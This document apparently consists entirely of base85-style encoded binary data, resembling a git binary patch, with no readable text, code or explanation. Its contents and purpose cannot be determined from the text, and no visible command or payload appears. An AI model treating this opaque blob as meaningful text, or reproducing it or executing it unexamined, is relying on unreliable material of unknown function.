zx6$Ob>auc~cbVW~&!4z2ZBr;enJ9;WhY0sQdPi&F3hQ8~e0p6uD|ckiO7YGJ!@Zm{ z^BvB6X|wl6IeVd@Z0CD&%$9DZHU-R21?bb`Vw8OmIoSpUh>ArB_YKn|$64%nh;YAl zw+c!r;F;^`ij)n9ayKkVYpujU<8*VuI=xSpV|0b-BURodsLkW}3z=selKHAs(hpKZ zAW}P2lOs-g)7?gQ5KN?^604I+owYc=&XkPOD4tPHQ*cwGAc9zD? 
zb-_S3%e6{Gblrm06Jdy`y@!i0#wKYj0}*$A4ZNuaxxh%A(JU}Y$+NMrsco^FuW+Hh zyMyT4M;LK;m5VNIzaY$5{8-r2fp*i^zLO8lNd6T*vf&29rML2-0RiILC!$s1*LxG+ zkMaYuTI;>BU=u4rvbN`ge}K?#>ylD7BH?Bx8!IA#)}Mae(84N>;r`s)--F!MUjA;U zaaKy(RT$d&O<^}@W&SQkuy-Lks1+KkOV{7;)ctKA_Cq!HX3o6L(k=3T0sYn zS%bSvZ)>tw3mBXnE}D&*+JJfYsw&>+$fQsFwpXuW%V+>)^;pBnm{1rNs+zMfYk|>g z7~)M=9S3h{A|!s?FEvok=<-EKHP$+-a`|!o4=KEF@cE$`|8mmMnX;yA({Fpl>%+_5H^v>QirsCsRxr~ zQ94crGi?t8y?!PA{s4?sOR>yY%Hc{6c55l_AS2{Nx5G++QeW%YResOwA_!`P7qWD8 zYNIzboRd%b;51&Em6KA^_Zb_bB$Y&Otn1~B3-o;VNUSn|sSjHXB1uldHU@;ur}%9o zZM7_wKYjcbr<0;Is1fF`n$zK~%sUE?4=i!dqS*)$&eeT^EPT!{l?k+1^9^dz1Rnb+ zDa8A-XZQdC^hQ7^d4yB>`;rg;{X(spV9uJ3NNnJ~M7&yyd?*=r#BH&$eUAjowmX9* zb9-`bpdJcdWK-FsxYh3yX^BC<^!p1g`L&B`Gh>}BdrZVp&D@ZWCrr+I7*wS&RBEVO zN=2O1l|>{R56o1A&#y17B3D~xbJe%!PfE3nH?PH(kgX|$iq0gsTIYp-J*U_ux@au- zH`miw8TY?PR;PT@Zh}=exvq&hG+NGuw`kh{s9Yy&KTq z+67O3+EF5_WBqi>$!dh$eaZtno@7{7Xi&$Eb+%ULrwd7nT0d(YFD(T>R0cIYAyhN} z$sINPcu*n1+NpMHQ+oo?-m~}>=q-oJFsA9Jap9AZ8iJQ$Ae-OWJ{@htW(P- zLbI(CdjZbX`?z<|qfYQC(}hBfkqcPFh;3A@U#g1@rzP)qs!Ej@E{-wo5zY{qv)A3* zjtykCua12%{4|5o94+bwL9HDGw`vV_uQIm09I{!_%yzF-TXXqp%rtngD72&9s@~K} zzMwTOx#2d}qZ?MdcBZst=_?rTCBz$-TuWQiw zmfX;pr$Lv|5!k*sb5dHn|Irsi_F}%0%JYoZ=ixU#^7l(n#+D^k2f|RDJoR2X?p{@o zzCG_ed&A4HVCi}@ZRQbXn&qp%GQZVuHB6`1No&30|6 z%j8dFSK7izu5v5$UQmCPZVPFry%<#{B;fCO*Zfn)!d12R`|xiOaC8Shw0+FJZAYbv zuNrox2>+7wOc=VP`GOw67;cew!8dssZwNv4Z}%D}bPU24+TBE58->LRoj=QM{pkhJ z{HZxFoEAd4;oBAgfr(evY4hZQ@gqfE&2}N|3})jZ=P1vv;FfKaDC~%8O7zoI!>~ju7+fqw8jSCG_2V;a zf5h!sd4<^CxE-RxOFAt$U8|RQQ@{HP8nU1G{zI>6%u_$~%SebnneyI|NomiT_`%Bj z!Wid+HR}&YH3-WdP}67!$c3+CCKn9)%!DjmGNMHm#%!YkYrYY?0C7?eh?A$;b{MsbLOqoKkrc;C6=jrKx^?JU__+^ z5Jl3--6Z8k4_5#6erb+lz1=ai!LD!TImk#38xhkU4G(LS@(lFNqW>FUtfX+|SJZ{) zeW{||lJ964z?XY)oOV}N((|%XmU3Yuuy>(!H+{%vxtA~70 z*B|}tg&s*8qEC7V&!IO78_HtInx=i4`cJE#6iB&7%YfS0L#A;Wuq$yBqq|qbQF0hJ z{;7OAmpg#I+EY4I=##lWZ&H}={#pbvy;o_<`*LB11xnN`FbDHm_-a|^gawmtc>Z}5 za}?-Q7o<5iV}d$nKEaXF!H(YUM+y$=fPk33$Cyl%Q`XJvPyL@hY)R5Fjl5sunUbw9 
zfcqgLS~x2RmX#%l9#YJk|3=mv6UHJRg+jzXqRf}dbM%8hW~%TaV#y=zoSS$F;{J1p zcw&K|r#Xk%)I%ka^a=veJQG&scVS6L6|T{1vsy}XyD(VhtGfne8I}NZ?}wcVbHUgU z)w)I#lyK`fE_NN>%G@Uy+$G1VN@cTrvB#HDp~w9;v0|0&Lt~_tK(T$%ppE?)ikbPp zwS)MnrvA;(g{^9lTIueIq{O!;Q>{~7P-jvqlbeF`$6PuN-vd;)VS%Q*yDp zJBm8ei^E?NkDr4GaUz|1Cc?8Ww@c`IJuZ$|k=($UmV9*?p4_;UfxL^2pezLWz!v|# zW#iwZncr=p4}4Tg6qa7x+cNYS#?$_BW%{XTLYMGP+pAxjO*n|SepGJ+w5Jl|0^Vls zKWn%mkVGD7(O0-F{JZ6^1c!gMJ5!Hb8j-&TCgOix5qac`0BFAIT@d&w=>O+J&1o8J zLa1>rkg)#c){A@|=u|(soce2}`oTBRKUnS|IBV#V`740yU*G+|KjgnxKRbt0vUor~CvWFI%=n zyqWI5&h+!MUv-;irXyC6fmJx_(*t63o!6>yn2OgQO2r=Q%s7cpYMJWnBCV5C$$ySN z_ha2^e(*+P}zl@}u6oxWhzgHVDD^5ZyJeNpDR z)A;kzdqvr@o%hUwKlEm(jd=ZR%yyf%$Yoa8tJ-|_`2!y~DeM?~0mDO9ta@#Rkz4pYOwLGnmX#cH&E(_3@Nq{?H`GITPiGt+hm- zM{PTGq@}7Jww>-Fu0QVqCnW~sGWi~TvydpTyZ7O)Q2d}8Sfse4EpF_I=;n z6Mqh4Jx6y}nw9zW>vbAF6_`k?h4TbcMbUJDZMyeAq2KL3A2uU7jG5|GYC;jf%0kv{ zp^WXj$dy1Qu4~Q4#ZPG1C8tW;XSQx=|8$+dKS;LBtq`?Zl(G`bxQn}(rV@M;tzoLS zWKQ0d<<_)n>7MA#S+jHR`%By?;yTf|z|`JriHgToJf+mRJ{|iW!3hMEi1P&u750X+ zJ|PjKd6R!{bCmxK#(HW#Q!AOh+tQJ)8*Q!Y`$KsdvRc59^<6N*H1cti@@u)}4I(Mj zq9ca8&Hdp|Y2mrx36tc5@%~jzht0K3(@zlfZZ5v6zG)7=UYBkcuY5a?){i$z>oBut ztAXZ?kaO=R|C#gm7>wurQk~=wkTJ*K&blSfyNI;q8I)$++S_l%$ihDoO}^N`Q-HCD zc^IqdxIGwc?VTRb)Is4UpN$Ad{ypsUUE{g@?_kafw5KX34pwX$l)NHZE{x(<%l`hj zs{4mi8JOpbeI%T#B7}^jN1BeEb3hlm-k^KCe&)i33mrM&iTnb&{IkNP>H;tk`btR~ zdj-2_ERZxGNY6a)wU!s5t)H~?*Zg_#FB(DF zRsrihFOo)06kJ~yXousDh?o`k+KF|&+sj3*cE++6-Jc{*r#d#~HSv*g_Pp{|zC;0RbeDnVscmQ$g_J8d|4og=85j zD=@$Hy~k&M9c?CKu~g$WW4KV^*cLaiNDSa~c+St$$MXeqFcf;+AjrpXc=X9 zCxr28Iq35CCmrmN&l@hC?t)adFICP0qwgTF-8E+#j8exg*~pO2;l?z*lT>#%f7Szl zEq!3r8H|Kmg5lu~9-aS@jfz8T2f9W#)~1>D&6cn-vr%=)+yq-uO;u4Z8%w>9*lO6S_=wgUjZk2<$^;ykYS--f3LJJ17?G3m`H z@wd@QNHj^=yTH-4x$7@`k@Lm$2TuTUq7%qG@q0jTlHP8IwcPwz?HoJfihxX~bKPw}gw9fe`YMyR&@+FL~S484q2z*@`;(4H{IYx1P zBwv(0U)t3ka*8MR(@w^hj|QlbKq@4=kS;-PxY#_)zzmp{vWt3ZFI%N`;OWRB;*RXo zTji;VBr)Id7Vz%0avTQGVun@pXIceV#1dm*{>{)(50=VHa>Qt;GX2 zlqX_qAAXpY{vpnZTdHBA@`0hC=hEeN`Ig(c&)VjrF^+AD5_Y$5L_Hhx<}GwxJTv|A 
zK+wsrV=UxIS}-4B-mJf~y%OjMg)=51dy9jB1-oZ$hmg3<=pAVf*jHE;p6_pOLgUkZ zV8|Iu{=8i}4YUx4&$O_Mw3uZs`ph)b9ulmJ9S04NAv4>tdpyz*Jtxe~?c3DzxTW&v z}6V^V>-vjA}ITat(LT0 zbG5$flKab_#brly&)-j;`(s48Q*XVLv@#YF&LP3Y!q`#U=fl$04#!!~u!~tavBf7s zYfv~v+T$E&ij1vk5t8z9oHzS%g0-Xx-{~rE9HFv@>ykLU-v8+wzh|%YQ6E~bJO^m0 zz{jq+jWv>XI6lqIH&)Uh5%x(nVm8Bhx~(OPnjFu?vW1~{sCDS1FO}OO#~$d%Q<_j8 za&!?Z@p1Y-nWsf9K5YN4+(7R*14JCFyFo$#Lgh5(b}-2VFrK~QPq=cr=(|s%bD=+3 zeae?^{2am?$62$sWjyx$r4{X;)m#Hm!E^{k6*EawV2jRYgZdy+e2?~Id5ElK zs9t9hoR!gL?kn#%|M-VC5K(m!b7NjHXwx_&oP0G!RwYuseo|`ad8+l%jjNEWs3YkaFb6+ev+uW1jAI%sBvl=)AY+^$ zU)+fjdm99N<)pIOGa?-w#kGDUU}xDFu4Y*2i$vA(6>>O#BB7cWo%bHB_u-f>XYPrD zX?TXlS)kzkL013akR@`{OYvQ#`< zA_53;MD{G@iE@5S%wS|6<(j>sEktfVn2KEZA}R5QI8s+5B&Cq;w_buCn~>oZAnh;4*o~~Sdv(gl zC9IGBArVg0$Ln<>6C*@pgdbxAd1Ps2S!Kuk8Q9t*lCof^FQ=c3d@7Z@KNlf{5weOY zA6l3@VbzE-bV9vz;yT-E-#(V^5P~!)>-}%<(k!BlZ$9E;oZw+u0lhwHEf!8 z+j8d^yM*mKlPnsN+)cTpO1z}p-XcJ@c)X!_cmPEW*2H7iGMgYr93gw`^_0BtIPu+j zePn}|wnQmU1`?DlkQP^OEmW99`WfF3NrVLUE@Sn*n0OzSdt z5GndoI#iK^09ahL{`5*l0y@#GJxWLjpu%uD97zm@-JK_8Ff1`uVy&-{3||3-A~b-E zdrjQf2#NoTJsy91avA1Q&DRIaG~TwrTr|nVF@#p^%M6`}Xa!yFp&Y`X2i zA-ox4QmEEpq0EeGka7P>x=EHlm+!~ZMfI>wm8G2Jb+9WF29K{%G3+ePESTHh{AhV?%+(kH4QuWH<0 zW6i%<$Hg)msa+pao2$Upt}ka=Y-YExGV5%*@Y~ZWVpm)8TKpTF{J#V2p|P zu;hs>PKn@d@&m+Q{M51|3LNf>D7NhwNahm^?)#b-ikAS3I$4%8iw@vX$CIvl# z8x!_Y5L{dW+7_HQX!Z`hlrnbsf*t8*W~*}A0B=Q~0qa-etsDK)1X*wIMAa9ST{r)k3OV_l z5l+b%T=B(a6*{25dhB5^TfDQGIJC!|YxbB>x9yI^F#(LUvR8-n34DJD(@&I)@`4y| zBGi|NGFuWAU1KltIN+T!TUb)KGigm4Zh%CMSNQVrZI$|xVmrp3E;CgkdssR? zT~>>tU9=-_qEfx}Qy}XbA+!E$MmzEEoRYFe?S2QdLBhn~EmJdi(O)3XPw>uo7}x4z zsTR4N`oZ_(vl&>Gat92~UDa^IPhb`JEoAEFWOm7kn085IE_!gb`x zTkhe~A=S_e{yCF-7vxvR?zJ5EXU%vl&hYIW2mfVcftFh@L8Y8iC&85qI6_HTlC+SybM`Vx2lJ)uEcEK*lJtKt$!5VRuR}(o6$mN%&y>%!j9#Gvy~TM*iku za4z=SB}!r3O>T$aPDw{$bv+u1u#%KH>zPW6E^|C`dDo?PC9*W>7M{M4m#a0FENRq? 
zVuD0>Vc0}WFG!sGWLY`S>dIFFc!l_`jKZ#nRuh&%>-9s7l=!3PD(rVX%#~1UPP~Qa z2VR*gF77>LIpLkNKN_Kmj9!B|=5${5!=)8S);g}ML8Qs!wTpkq<=>zuKO6{(P0krj z06xNUbf{26g5=ePVy(F_3dRpsao3}Xx=&$j*^{?G!B5bz{=-OQ zmuK@qll0D^YE6ga?B2Zrs&A(%7!{Zkp(77#>PD_T%IBW+>hz3#^`606lil7S_ewOprNJ+0c)FNnl*_-iOP5mKy_u5uM&T@~ zwrdW@IScc_F6sWo$Q2y+yUoI93w#QGFlJa4#N%S{Y>Wq_c-4DC(;E;a74PoYO=W5% z9ev7nGh9YrxO#gge({H5Ad?z9F}fev)|I!HIZXx|+(tYA4nqsir;9u1f@^Wi_(Bd= zVZ%!dtXJrt{@C=M!kxw!3f+wsX4jVTRPMqcijK@azFZ;Q$iz;F{ypW~;azjUZ@@D8 zaz*Wjj_7Kj#0{&xbAXz@!_mq#36YXM9s# zn_Tvj!3Ve#MyEICTsLFS*NAABMPFWmwkD0jJrM@RiK@Gj|KOwa50S*+ORd&r=%#wj z6~^GF7@dsvAgL*^j=1zWq|FbEq4a2XKr6>=;1myH6L$7pl`pOUgMLnVLBr4?*74)A zTG~6?6T4m>_DLvm^O;?aMKN;ayeY9@nCg?y%GW#d%WcE=s9C=!LF-G8IB*JRuTyG~ z8SYCe)D=098D!y)Ve2FBA)zVf45O>Gr(@5M0y?e)tAH+x78x_`S*5dFweZpwy z|6rxhz?19ZDps#yFvoQ5UafD8RDB7=z3_eE8SK>FTl6{Wx%+$4N*L*P9NT$Ho)4q7 z_sr137uQaOV4p>c9X6;HIehh|F~6<^rizAf%Ups6+U`L>cZUQrKS zUJFC(=8b)+57;?pwGmhDZkAGj1{~%hiNpP+Y2&}@_H64^?Pj8bSU-HyxS+7s=P&!2 zhRE~Ds=Gm=G<3?}Rg&*Ge#X+hn-Ma^{MHR1@kLYo4y*wtr9I`g$6iFh5bK$o3`#6= zOo)3UQa=EPJG{|ocEuCL_qrQFD6TT|9tybSKkPC?dpLAGb11=-Ff{C->qzktE9AUa zYfQ>9>!=EsyR+S_Q__$89TX8|xi1TwfK}O|H0p#=!g$~@QkA0YkuA(|7QWR0fzsx@ zX44GY;Mc&!Gu8@IxzCc4BC`K+ePHj!bZZtT#*O21Z{T&r4!-cLdqRZ^m*}4KPfzV1 z_Oa7jHVy88193%|)S@0MZtu|CE}b00fAA<`+o3@un$86O7F6@n)g*5GFk&ql8q`g)xUL}^IMiCptiAg}$aGm<+ z#cyET|5ymvFS}j1iO&ERKb}c@15SkuL3eFoHwZqS-g1r*&pGXekPD+rIf3Xt-v-Jk z7xkCTZ8%@oxOT7{SH2mlQ4hW5+Esk3DQl@_yaMF#5#P^WR4cFr*xHM25w#+ZYAGb< zodtrH;(dbk+D@AFp05Iaj>NgsF{?#bi?GYGM8p$3eoJ{jHkMdl(-lM@{RT)If;<0T z5J5joK9ys&gY0B{V6*Yav&gvGxh;Qt_093DWb96DI6!9ZiaQExQL9Z%r|cu?a%Inh z4rBx)r({cdD`c3URbKnupJ68Eag*!NOBFka6)9(uq8WGM#xebkxRBRu@2+8LYi~be zmzl}sQ!E-z@S-77`|=x?-EQzbmusZ5e#UjKw0N?PC1ZVPdk-5Bl9fa3Ms&&&=jT>A3C8i!Eu%FtzFm%Hga zBnE%ZO%LGR-VRfQ6l}drV&kJAPT#Z+_qOAN4JZb^N-u$?1=QrHPAr?|dEoT|J8bHx z^uuT9jMG(L{T+%zWiAZSB8Cic4HWL?e$6Snm+s;CQOT++(LC_ZX64EsAhsh9(^-!) 
zB@$gMx`c5dM;1REt2eiGN5m-KsedUdgTqDd#qL6*GjZQneO3v4E>Z2}9mFkq!tS^H^8)|#1L zXUJRX8bI!F$3$5p$yiyuJ@TM@En8|3SaBw0~ivkyI)3*Bq`$`P}$^=~Pu}t4@ ziK3SDv9mr&aPL3iS_~@B;@UcdXQ; zvg(^39ku1QE`7)bjU_AvSE}+!FPGiPe8IG8ldLPxM|;Ftpj?trN&%`4J&ON@$Wdv<=f7;*sd5?J*+dkhjAlBv$#Lj zo@nOceT!za>F#YX@EPxp-v{ldVHVRuSt~OFW3|b)*)0^X?Ojj<{hC^n471bs;mZ?z zj|F{>bO#5RYg5gl%OC^grUP3uvpEysEKgNDVFZ; zSU~Igm)T+33>1F!4g13~49k24!pFG6 zemicO%!1u0e;vMvA5eZBdL?@Q-~4|N2!wN&PKZ;f9%)5% znOKPma>rxy4%d@!S`@U)gkSZTiFb*xksv{pNrW-oByKxmQ}z4HT^N5FJ=@+q{~EOR zH_@Bl$##+hx#ZBevtw%>{~u*<9aQDk#tjRClr(~bbf2B#pKpN@p?(UQh z>24|M?*49%=NviT%scP%&g?(#8QAw;>&o91>smFL{9Q6=3RQ;oD5Z<9O?M*Qo}Rif zG$$E4Yi(eHR78KxnypD;8Bh1%PJHP7WNU9fWjGOC&=y(FlO1Oie_g1Jhjn_v$E@Cz zHl7Nn4jtqqBR*Wlp(@1p0^;w_4{pLA@A=1odA0@GPyCd->a3*!Wv-f=o$hHq-IH!l zB*FP=HI$}_L@!^#6L>ytGK5cEdJd;%C=at9G8zr#(x}%V7Y(rk0Ch&2H0u4Tv>WPx zw>C=o3sG#XW+#4BQppUUPWg7}x~e;~)!hZI2t=Zf+B!C)hPEaN?a5pMKR@)fAP#@N zQS83`n;?_L{A(f|)V6x#+4NS0dpm7^{(7!-8(j;t>0(Ce%tPI((W+jIXcBSsEQZHh z*Nr|rlZl@+rmBPJtxN}Xvq_J2Q>z#ZHYru;CG+`7mHaQ;GQD56%Ju%}JKcO5SAO}b z$l38_X^~AB^bE=xsE=Nk6u49@Q(_HLCSg1$KWioL6o(2MwIn@Y;RJ)+^O0S7dd!3V zn*lX3HiHxXRK9Fz6g2(|@P9uDgzZ;lQ>NR#w_JXD9kAr;a|#``7M%HxX&wyyO8))` zfh|@W-wUTqi|C-x;6TYENRu4Q_D7;GMt()#LJ#uheD7US_e*Xa-)_*5{Z+tAHR;l1v zrd}gvp!Ty(rIrb;MWe+njEjrw+-1r`|Gn_yp5x(0o-!^D4)u}6jmP!=oZUD!9}v~% zH(1G=G-%%h@KNc?a+Gg4bFO4P@wk)Hpd4XTd#7zFBb(i=-mOLh6={ozkhX)HCfQ9^ zOnh|c_xl*Ike=~I% z&IaxE;_pv0A_NX8c_oyFM?^d8acXL+i#B2sW9{*Q_|?moJF=rhV!+67w+fwlRr)+U zv)%IgKpF%;e?J&jxCRQ%#!rU!dDU<*Fa&gTbQFZT6-sX2kaFJMh#R@z7Z!pwG&DjI za(vSC~M-dH(X7i?7 zUuSJUJOt~bRRl@I z(3J0f(v|QQFYrB3c1WvGW3f6^tA#=TVJ5&;;%GjNOnkfBirf&jMiR*sh6rFXW3I#5MEwcV!Bv9k?e^-!Dd0v-Qfo}281e`!N?YK^HWc9!0^Kw)qv0cNa8P%yXgibq( zP(=IHIYYzYemjG0$&sDvbtf|=dQfo!9Rz54RPfn?ovxtyWX=y$CL9exNi0?ww3@D6 zO{x7+J@QSpc)jX~Z~piKKxlqgKolcGs!m*5*i}}CXhVG3TaI!#TE3g6owYx4$mK_NqcojLTmIJMt_0C~9Db0eFZ>gno|k&!`ad5xF{=#7$9NF+711kQg9 zFEu_A?O_%$pIsEUfU9p|aL@;L^uMM#lGZyve+KRCTTxnC+6|gix~2wxg|ts2q=pF3 
z_VSSq90_eMn5hTsUt{t=K6nH4^~of*j(iV#Cf5Jkm&-B0po8{7SnL0q*#Gr`4+Z}P zzbp#dhj_wgQt@2K|Ig2}!7m^{mxQ4<{}GJmw(kG*j1PkZNF7Wvu>|sexbVNcXdmD! zp=(4B+rRGqe|`800jOLwgcM5df2Hq#`Tiy03;u`}Q9YdhXWoc{L*SE(fs?_=L;P>d z{NskeT#>B<(zjQmWEyymLQM8+h8f#cP?~np0BzGLau>~byz}xeHN9ix4%QH zgMIj=A=n?ej74d0ZI`o+t#iHKz&>>qd}ESX6rofZ`w z45wHslSmnT=T)lF^nugiU3T2+YNg9c>bnBtRd9bvi$sT5_ir5rNgEsw^GxMCE;T7_ zbb7#r(_Kwvv(mv*8d3dQSv*9nar#Uy3lvy&>($?z&MedieniL>SblPQizQWspqYu2 zT99vd1HKVSogn*8pBNroc8s3s><0)o)Ct5*g^_WNOOfodW=01w>b<}}*`NVN89z5c zv1NL26i0+!v$kTb)}nUhDLa%%k#82K;4%S?7*61L)%C!Q$3`BH%Nv#}mlHYB4pwl{ zBM1)oTsQFAMN~c+{YPi(`NUz{s-tSJ_w;{Q=>!EcYa8_uQ3KH3&$jn^Y!g}?$cU%w zWWHE`$oyjwqMWY$=my5++_x2vQSlv9ijf*@ctCnUfM}4k%%`j6mspIej&rpporncC zpXW_^mCIH#``d;hb`qzk=rx;v?k`1(f1aN=5W5_Mo6GcXJ&T+^~TB(juG{kF_ zcu>ZRJQ*GHfC&9cVcYl8`x=J0d!;O+(}&{y`$Pr<+l>CGeWFPp;BqlD7-qh9oWD0U zjA?z!@oQ5X@$b2xZ7L7?uT9DP*_037MlWCsdu!p>)7VU(+XzwcS&Z2$0qA=3! zLAAGqnpr3}ET!U6c|#csU{`Bz(BAPnhdm~@DM&f>c^v|mD@(QXUtuyuW@h=t_(y^Y zMB)%!3~Hs=23tRRKM50j{2=U5Cxa%qF*6;e6mjoILaMXTnYzbh4?o0h>v#L;_;p~j zPpHY2IaYBRdXVk_;~?9uqqA?$n?{mZ5b#i5m=KX`N6K|{sS`!Y^a^=WV!Mm|ogs>9 z+K@hkdzhI}NFRT1{~SR>57_(@LV6dO6w(y(yBgr3Nn8`u{IbTzZ{aZ?tCFn`uwn` zGgeOryJ33@!S78~?sYulC7kJcPSd2zs)MO47c0$fdect?D6UM7DwfeNkdlcTsIo5r)st#9wHnK_)FU<^L2^IyOjBb1`PVW`P^&-H!^TlqOKKQmVQt!J?@Oxk$2J;{FCr0&s0_<2q4ZEtJuUUN8S=Sb-)4GiiJXq=gz}Ru9Y0h+V>*(WaefGDr?5QD?cp z{{`V)#(a<;nl-%Xrmdw6tOkRwYoK$EusOo z;w?}gh%D6z1+1+uxsenGrQB>NrLq)Quz9W*0o^aLP5p%f>@d5yWsMrS@Alfct-USGHe#LnNE*#OU<>Jq6-Jr zF(qf$xuw8;=e{z)4>zkeHTzTmf2_d`%)%ZPLm)(g2xD)PBJc|lhm0u!Y#^O4NO&x+ z2tkxzM8lq!PWx+aO+Iz-8`)Q6vIp#T zQ+~gxPi%CsxJhWwQ*fSFOQ-<~FfKQgLGv(!lGK#r{(#TeKK(j9PmTFx*hznDzv7&A zUriA;VNP#YmDvz7fRczzsbYwE5pM2K>1nsS-}Xfcb}SkN{7YRPq<|B%{t_}t@T+NR zsjR)Yn4QKd)-i8ZU78x7fa1e@WOrgA7ArV`FGMBk5BBF`$y2*nweCuuCA%k;Sr!?X8!cd0vv%+x;@!Xc}+%wg~J zM9Jg?aiO0`iEws1|2)%sTgnBSTRM2z;|y=}&|p!B4Ks*xduPCQ=>7Q%aFxue>18rI zW4>4T;g!OWgm2%?nd~@a#Pvn4w&xVgeIc}sWDMmk^(?&FaB`18N|jNTanJYnu<*Ul12Wp3rYD2n+*(m$2&u#};Ku;@h#j6Gh>q(8_?WY}b 
z`CJKwVin|pWYsH!;#%6ZXU>%xaIV((38Dbr8IRdJA3S&7%^r-QACMI9G^a!MmKGlLuom!X!v^!rr@uj~_~-{x!f{$`>_~)H|E^;ul?wrCJ80tT zWWkBKn4^^1i*)wG-(i-VcUMXo+ySHUC28jI@p$n97wm%&zd~wtWmpbxwNEC30Mg}1 z|K3K-yr$+%z3}FgbGeLvw+x9dC`ZseaezR?oQGiM8w~pLep5jegh5!kaqEv6*G;fF zL`Gv`YT^pTj2Aiu+t(?*a&Gb@;dK$|+s)<13afR@mG7R6&-k?{wBX*@aT0XNeDQsQ z&y(iwLs(0`;d$#nA67zW0}wjE`8&I9f(m{Ym(ws;T9p7-&$npugSkP`LLR*oNVB}GN0Ca%&=|*12|?f1+o?L)3IBe zFa>AIM8*yl#%#^yeKL(kGEHV#3D&slEv2RkbJNY|G`1&qfb*dwVwb9g3bt5me4e4Z z9|OF+qEP=bmV|K9j}Ps@td~jlxkdn^M)O+H!nszqCgiZ*v05%>uM!E%^LZWeY8^;S zm#KdMMrDs15_*W9RI=S6e)UbU7yr2{opoEk1y3jrz{V?-4uDefYYjVkNbmz=!ZjQa45SNUzr( zOVc{=YsGb!{jF{{&s-F{Po@p0)Wo(02Nff=*G+d_WU6A8SO+0eFy|Ty8ihQr($-4~ zVjWi9D?jmS2KlEbT}<@X4~Nqdl$2mWV$TkclM{J^1mfZ7P1BSG2XebMp(|PeDC(j0-!BDmJg&R30Ya> z%}?kc4(jEcMifro{G14E*6CzF;Z}yqYes_+_FKyd8}{LjOXdQ_KrUfB9Y?#=!`o?_ z*HoJiCJAV`BtkOT=id%jbL)x;Rm(-gXwWOzLR2dh$w;g*n;`VZu%OV1FOX-vu2D%| z28Y^)jH&Wg`lWBzIyvrb%_xS&h^dsQH|l#^WB)9`=0f&F!0<^g$Dr@p+V4kQZIbZa z=#Ro|ATQFOV6U;jHshwFrWS_&Io$0HGfNFv3jY6i3f;Qi=Kva%BJ-y!S7|V%C z0UXMUDh^p7 zy8)RmbfOzgDv5QHmQk;Bbq9eSM9o8F{49{ICHpui>2qL2*Q({Fr!}wcwiGkz!|dvl zRChF*b{1QxjejE=2R1F zyDtL%1P5Mzzv3Pw4MG<2{PgX$O|$d8kQ-sf?YRro+jQU77_=-gmI3QncW#&@Hr%6{p-3ATBd$`^{nA?WPp1DEW;* z64NWoAJvvU0wQ+>YiKp=5JImZK|$m}G*A_g1PIjgyQJ|I7a6ynmJBFE%~HdLxOUujIwFgus-CRjCLpm-#$2sO0ADwrHOuf zOI975>w&(N+ATEy(TpEC{0%y~Fb17w?pk+HM3bx7!Eqq2(U|0n<%oV8HIC`{^})L2 z9d}3=&RC$e%cTTppHvdtoPb>ILYu8bqo7LEa2O}%Mx*&Hh&Oa1Fv-n*slcAfF-H_v zI@t{*pXc9SUtrrZAPSf^l;1cIBKdq!*=jWT<`E60@GdKpNixVMGmcJMu2Yz117#qN z4mckAm`x4!pX@a;Uwdp4gex^~0c;TU5~`4p(0E%B>sac8NXW5(Ot#=!0Mv~znP60f z(Fl)DqdM8;ZK1Z6=~Q7uE}HD0_|X~xhzZ#qxrl{isOtzsAd$oA>ONXpDWRo!+KNn^MW%claer7V*L@)MLOWidyk8o#@0 z`^;37YQQ&V?C*~SM8XA&ip|;_@RV>kCNboQeb`3{eW_mkfpyIa)5z=tDib(y0)>YJ zuXTjSva>L$6^uB4f?qej_-DYvz2Sn_a`iRDX(sO$Wc9C!08b!t#Fafrz($djsTQhN z-fQHVKJG|QBnhBl=-%o%h%Fyi*bj{%)nc{VrG=2*7nZ2F*F!)QhX9#-2Q0O0_NPDT zEVQkuow(YSEI!n}%efkb(HnSZRBJrfi?hsws>OHwyf=*NLujW$td!yl9i#>GPBuK1 
zL)k>Ns&RB=J%omAPCy38CrS!_fh-cIRr)RoowiuuWK&nC#Y-)qOOFCoD+OG+QURI8 z|JnXQsUXtF<N_A4)B^y=y~Q(iegVzK3#M*~vR`qVO-^2ED1AJ1g}UurK0ML{!Ym3j5>QO%agm{efT(4eKW z+bX=;QJvjn$C&bBX&P}nGXxpFjDYJ$=+a5Ca z4O+rFc*vceqeb&8yUs_tB$)zp%%KuX1!*dB4gw)HzvX~xG=AB#0g$oo1Z<_IE?kgS zb5JIoZ+ZYoalSpX%<>JaocQX%cbV&)Nj?6leAX@D{z0;0Wk*`&uN<(lk&cPiAf;I7 zAP);IVC*q@_Ui)N84c+4%V39r^O_7i`RQuhF4_|}4=viWSq5Zva)#GORq5OJH{`d@ zZuvsvVk&ngw8f8aU;QfZhI9vOkLM0?)EN!LnH=Xx>z&W7xX2LXkXO9=N@q1oHp#+0(fNHtIO zmjKGAkK=%kt^Kzk@RPw#d(tT4dA;o#kK1)lXpIuqw$Z0!w-ymVRdhQ4WuDolj^=qsnu>0iE>QK zO6hPV{4gew zQc=vZt5?Z~5O>?5-At{5Fj)##*+<@KpuXsS73=H+ zB5fY!-G$!kqmWvJHT)kT0B|J(Z0~o*;Zk@XL4gAEg0(JfG&|85 zcqtjrrZ_zAxg#(T*}d?wNAyn(%xfLy7r?dq7?!?$5@p2XcCOE^YE>q|bn2!uJgAsHs|dOmD&jSQQQ!J_7v{R;V9vX26Ux*%L2 z^_XkR&R|ls+l}Y%kJ==Cw|-2r<03^75}sB932O4?D?C}GvE{JiDHT2t-%`%a#Z^vg zlYEE1$Agx%kjqhndbkj2D;h9Z1&>W=+&>;?+aTB~MWh*qS?WG_YOU6!v}I`iJ1|eu zd6R(qpS&~->M55ymgGXM$oO;#^7(0w)cdZKTiDk&Uw`TqDU7G>E)j?1sNfr-0RZ* zK&;1fr@;sQB{O4LLjOUvI@8em1m8bx%{r!MPSzMGChqKa9u?`%)#O)NZ4i2Zy+=FDWHzmFRw#rmDqU0+JvcCTpIu~sIz+H8 z$Zs2CMNG^lxi^3Nt(x;Cy8Yz}(Ox-Rb=6Dt9@Uj;pUgAFR9U~3>An+@89MQoX1mnf z6sWpa?#zb8%H8ruN$K0|-$WDH<&83al@ox@9$3gwu2i0fAW}&L`7?78a=BMd4~fPz zhtP?<+GMu67{-i7T|v-W-`)9}97P6pSHeZbZ_d`;>pKv79l!jx*{U`vDz~S6n6_(O zfnw(+y}&8{wwgtNUk3}0V~ANj1Fdm4Pm;^amv?KcC2#`IYqxyOzgQOFcr29vf*+Y0 z4O2@v%;~EY8Fn|y7Vjn^`&?nn zz_`(Y`ddl2&YvmOhM$K~#GmMR^8_IGjSf1-9bXFvmos!CyZT%iNKi?K_Wy)IMw>!g z3)XYQ8}vY{lM~BZQr^!4k(E+>*pIM> 